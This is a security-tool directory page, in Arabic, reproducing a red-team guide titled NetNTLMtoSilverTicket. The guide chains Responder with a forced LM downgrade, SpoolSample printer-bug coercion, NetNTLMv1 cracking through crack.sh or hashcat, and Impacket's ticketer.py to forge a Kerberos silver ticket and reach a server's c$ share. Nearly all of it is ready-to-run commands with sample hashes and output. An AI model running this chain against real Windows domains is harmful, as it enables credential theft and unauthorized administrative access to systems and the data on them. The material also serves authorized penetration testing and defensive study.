Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
NetNTLMtoSilverTicket — SpoolSample -> Responder مع تخفيض NetNTLM -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket | Kitploit
أدوات/GitHubGitHub/notmedic/netntlmtosilverticket
كسر كلمات المرورتصعيد الامتيازاتالاستغلالالحركة الجانبيةما بعد الاستغلالاختبار الاختراقالمصادقةالفريق الأحمر
GitHubnotmedic/netntlmtosilverticket

NetNTLMtoSilverTicket

SpoolSample -> Responder مع تخفيض NetNTLM -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket

عرض المستودع
9761195منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SpoolSample -> NetNTLMv1 -> NTLM -> التذكرة الفضية

تمت الإشارة إلى هذه التقنية من قبل آخرين، لكني لم أر شيئًا متماسكًا. فيما يلي سنستعرض خطوات الحصول على مصادقة NetNTLMv1 Challenge/Response، وكسرها إلى تجزئات NTLM، واستخدام تلك التجزئة NTLM لتوقيع تذكرة فضية Kerberos.

تعمل هذه التقنية على الشبكات حيث يكون "مستوى مصادقة LAN Manager" مضبوطًا على 2 أو أقل. هذا سيناريو شائع إلى حد ما في نشرات Windows الأقدم والأكبر. لا يجب أن تعمل على Windows 10 / Server 2016 أو الأحدث.

هناك 3 خطوات رئيسية

  • الحصول على استجابة NetNTLMv1 لحساب الآلة عبر SpoolSample الخاص بـ @tifkin_ (لي كريستنسن)
  • كسر تلك الاستجابة NetNTLMv1 مرة أخرى إلى تجزئة NTLM باستخدام جداول قوس قزح الخاصة بـ @0x31337 (ديفيد هولتون)
  • إنشاء تذكرة فضية باستخدام تجزئة NTLM التي تم الحصول عليها حديثًا باستخدام ticketer.py الخاص بـ @agsolino (ألبرت سولينو)

الحصول على استجابة NetNTLMv1

تحديد الآلات التي قد تكون ضعيفة

باستخدام Powershell، احصل على قائمة بأجهزة Windows. الخوادم عادة ما تكون أولوية، لذا لنركز عليها:

root@kitploit:~
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt

باستخدام SpoolerScanner المعدل قليلاً الخاص بـ @mysmartlogin (فينسنت لي تو)، تحقق مما إذا كانت خدمة Spooler تستمع

root@kitploit:~
. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}

يمكنك أيضًا استخدام rpcdump.py على Linux والبحث عن بروتوكول MS-RPRN

root@kitploit:~
rpcdump.py DOMAIN/USER:[email protected] | grep MS-RPRN

تشغيل Responder مع العلامة --lm لفرض تخفيض LM

root@kitploit:~
./Responder.py -I eth0 --lm

تشغيل مصادقة

root@kitploit:~
SpoolSample.exe TARGET RESPONDERIP

أو استخدم dementor.py الخاص بـ 3xocyte إذا كنت على Linux

root@kitploit:~
python dementor.py -d domain -u username -p password RESPONDERIP TARGET

مثال على الاستجابة:

root@kitploit:~
[SMB] NTLMv1 Client   : 10.0.0.2
[SMB] NTLMv1 Username : DOMAIN\SERVER$
[SMB] NTLMv1 Hash     : SERVER$::DOMAIN:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972:1122334455667788

كسر استجابات NetNTLMv1 مرة أخرى إلى تجزئة NTLM

يمكنك استخدام مجموعة من جداول قوس قزح لعكس NTHASH إلى NTLM، أو يمكنك عكسه إلى مكوناته DES وكسرها باستخدام hashcat. يمكن لجهاز 8x 1080 كسرها بالقوة العمياء في حوالي 6 أيام، لذا فكر في جداول قوس قزح.

جداول قوس قزح

  1. بالنسبة لجداول قوس قزح، هناك خدمة مستضافة على https://crack.sh/netntlm/ تستعيد NTLM من NetNTLMv1 مجانًا. هذا مقدم من ديفيد هولتون من Toorcon. نحن نعمل على نسخة محلية من جداول قوس قزح وبرنامج لا يتطلب FPGA للبحث.

  2. بالنسبة لـ crack.sh، التنسيق هو NTHASH:(response)، لذا NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972 من المثال.

أو كسرها باستخدام hashcat

  1. أداة @evil_mog ntlmv1-multi أدناه يمكنها كسرها
root@kitploit:~
python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788

سيعيد هذا الإخراج أدناه مع التعليمات:

root@kitploit:~
['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']

Hostname: DUSTIN-5AA37877
Username: hashcat
Challenge: 1122334455667788
LM Response: 76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D
NT Response: 727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
CT1: 727B4E35F947129E
CT2: A52B9CDEDAE86934
CT3: BB23EF89F50FC595

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

To crack with hashcat create a file with the following contents:
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595

إنشاء تذكرة فضية Kerberos

ستحتاج إلى العثور على بعض المعلومات لهذا: SPN للخدمة التي تريد الوصول إليها، SID المجال، SID حساب المستخدم في المجال واسم الحساب مع صلاحيات المشرف المحلي، ومجموعة مجال يكون المستخدم عضوًا فيها إذا كان المشرف المحلي قائمًا على المجموعة.

بالنسبة للخدمة، الأكثر شيوعًا سيكون cifs/ لأنه يعود إلى خدمة HOST/

إنشاء تذكرة فضية باستخدام ticketer.py من Impacket

root@kitploit:~
./ticketer.py -nthash 09e55a127f3d4e4957c77de30000502a -domain-sid S-1-5-21-7375663-6890924511-1272660413 -domain DOMAIN.COM -spn cifs/SERVER.DOMAIN.COM -user-id 123456 -groups 4321 username

تعيين ملف ccache الذي تم إنشاؤه إلى متغير البيئة المناسب

root@kitploit:~
export KRB5CCNAME=/root/Assessments/NTLMTest/USERNAME.ccache

استخدم smbclient, wmiexec, psexec, أو أي أداة أخرى من Impacket

root@kitploit:~
smbclient -k //SERVER.DOMAIN.COM/c$ -d

العمل المتبقي

  • توزيع 6 تيرابايت من جداول قوس قزح

    • تورنت بإذن من @0x31337؟
    • قرية نسخ البيانات DEF CON؟
  • تعديل desrtop الخاص بـ @0x31337 بحيث لا يتطلب FPGA

    • خارج نطاق خبرتي الشخصية، لكنني أعمل عليه على أي حال
  • تحديد المزيد من الطرق لتشغيل مصادقة حساب الآلة عن بعد

    • xp_dirtree هو مسار آخر
    • هل هناك من يرغب في مشاركة طرق أخرى قد وجدوها؟
تنزيل الأداة